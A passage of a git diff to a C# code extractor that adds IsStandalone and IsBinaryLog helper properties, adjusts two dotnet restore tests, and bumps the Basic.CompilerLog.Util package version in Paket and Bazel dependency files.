b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/BinaryLogExtractionContext.cs index e4ad5f83e2a2..a77e44f2456f 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/BinaryLogExtractionContext.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/BinaryLogExtractionContext.cs @@ -47,7 +47,7 @@ public BinaryLogExtractionContext(string cwd, string[] args, string outputPath, public static string? GetAdjustedPath(ExtractionContext extractionContext, string sourcePath) { - if (extractionContext.Mode.HasFlag(ExtractorMode.BinaryLog) + if (extractionContext.IsBinaryLog && extractionContext is BinaryLogExtractionContext binaryLogExtractionContext && binaryLogExtractionContext.GetAdjustedPath(sourcePath) is string adjustedPath) { diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/Context.cs b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/Context.cs index 67bb2808ae62..f231c8238a96 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/Context.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/Context.cs @@ -267,7 +267,7 @@ private void Populate(ISymbol? optionalSymbol, Entities.CachedEntity entity) bool duplicationGuard, deferred; - if (ExtractionContext.Mode is ExtractorMode.Standalone) + if (ExtractionContext.IsStandalone) { duplicationGuard = false; deferred = false; @@ -376,7 +376,7 @@ private void ExtractionError(InternalError error) private void ReportError(InternalError error) { - if (!ExtractionContext.Mode.HasFlag(ExtractorMode.Standalone)) + if (!ExtractionContext.IsStandalone) throw error; ExtractionError(error); diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs index 262475ca5a16..899be99e028d 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs @@ -15,6 +15,8 @@ public class ExtractionContext public ExtractorMode Mode { get; } public string OutputPath { get; } public IEnumerable CompilationInfos { get; } + public bool IsStandalone => Mode.HasFlag(ExtractorMode.Standalone); + public bool IsBinaryLog => Mode.HasFlag(ExtractorMode.BinaryLog); /// /// Creates a new extractor instance for one compilation unit. diff --git a/csharp/extractor/Semmle.Extraction.Tests/DotNet.cs b/csharp/extractor/Semmle.Extraction.Tests/DotNet.cs index c584b607ec8e..904ad04ce82f 100644 --- a/csharp/extractor/Semmle.Extraction.Tests/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.Tests/DotNet.cs @@ -123,7 +123,7 @@ public void TestDotnetRestoreProjectToDirectory2() var dotnet = MakeDotnet(dotnetCliInvoker); // Execute - var res = dotnet.Restore(new("myproject.csproj", "mypackages", false, "myconfig.config")); + var res = dotnet.Restore(new("myproject.csproj", "mypackages", false, null, "myconfig.config")); // Verify var lastArgs = dotnetCliInvoker.GetLastArgs(); @@ -141,7 +141,7 @@ public void TestDotnetRestoreProjectToDirectory3() var dotnet = MakeDotnet(dotnetCliInvoker); // Execute - var res = dotnet.Restore(new("myproject.csproj", "mypackages", false, "myconfig.config", true)); + var res = dotnet.Restore(new("myproject.csproj", "mypackages", false, null, "myconfig.config", true)); // Verify var lastArgs = dotnetCliInvoker.GetLastArgs(); diff --git a/csharp/paket.dependencies b/csharp/paket.dependencies index 58829b5ec06f..9413de7b1fe4 100644 --- a/csharp/paket.dependencies +++ b/csharp/paket.dependencies @@ -4,7 +4,7 @@ source https://api.nuget.org/v3/index.json # behave like nuget in choosing transitive dependency versions strategy: max -nuget Basic.CompilerLog.Util +nuget Basic.CompilerLog.Util 0.9.8 nuget Mono.Posix.NETStandard nuget Newtonsoft.Json nuget xunit diff --git a/csharp/paket.lock b/csharp/paket.lock index 795b9d0cfe1b..8120aadb5bd4 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -3,12 +3,12 @@ STRATEGY: MAX RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json - Basic.CompilerLog.Util (0.9.4) + Basic.CompilerLog.Util (0.9.8) MessagePack (>= 2.5.187) - Microsoft.CodeAnalysis (>= 4.11) - Microsoft.CodeAnalysis.CSharp (>= 4.11) - Microsoft.CodeAnalysis.VisualBasic (>= 4.11) - Microsoft.Extensions.ObjectPool (>= 9.0) + Microsoft.CodeAnalysis (>= 4.12) + Microsoft.CodeAnalysis.CSharp (>= 4.12) + Microsoft.CodeAnalysis.VisualBasic (>= 4.12) + Microsoft.Extensions.ObjectPool (>= 9.0.2) MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) @@ -96,7 +96,7 @@ NUGET System.Reflection.Metadata (>= 8.0) System.Threading.Channels (>= 7.0) Microsoft.CodeCoverage (17.12) - Microsoft.Extensions.ObjectPool (9.0) + Microsoft.Extensions.ObjectPool (9.0.3) Microsoft.NET.StringTools (17.12.6) Microsoft.NET.Test.Sdk (17.12) Microsoft.CodeCoverage (>= 17.12) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index e87f635dee0d..90d568ba3a83 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl @@ -7,7 +7,7 @@ def main(): nuget_repo( name = "paket.main", packages = [ - {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.4", "sha512": "sha512-VJMBSOOcdPD6ihA5k1gnVkDbH9GCABmx1055fFikEImT2dFp4yZhN7zMd8PW14tIb3BXIieP557n8xE+J2Y8Dw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.8", "sha512": "sha512-bBlxHTdPRrmaw4AqoNwtx3jyAP63RVp2kwCn+UegxrimDYVCmhdgCkFjzlAc2Bo1LbO7HrsFhfh6lFijugOX3A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "MessagePack", "id": "MessagePack", "version": "3.0.300", "sha512": "sha512-5Mdl6CrQcxVVLawvqebPLALFdIMgWOnEGxxFvXWjJ/8KGyyhbfKMusj34Wv1AwE+uE9VAb+McVxtR9HDZIUwuA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.300", "sha512": "sha512-Jh9+7EsDtDSEciX8RfXHWxtRlC94wvCmmv+sFzGdzPF4fAp7OAGFktzViPBHMkCxrSh3hmM7jGUB7yMyUmzRCA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, @@ -25,7 +25,7 @@ def main(): {"name": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "id": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "version": "4.12.0", "sha512": "sha512-j/XDFfNu38FSTJOIhkB8pvLWNVNqNhaZTRtLuH/WsHUsnYfIztaDW9seR7OsUBF5LuZIKQ9uaCrj7p+0/BgPkw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", 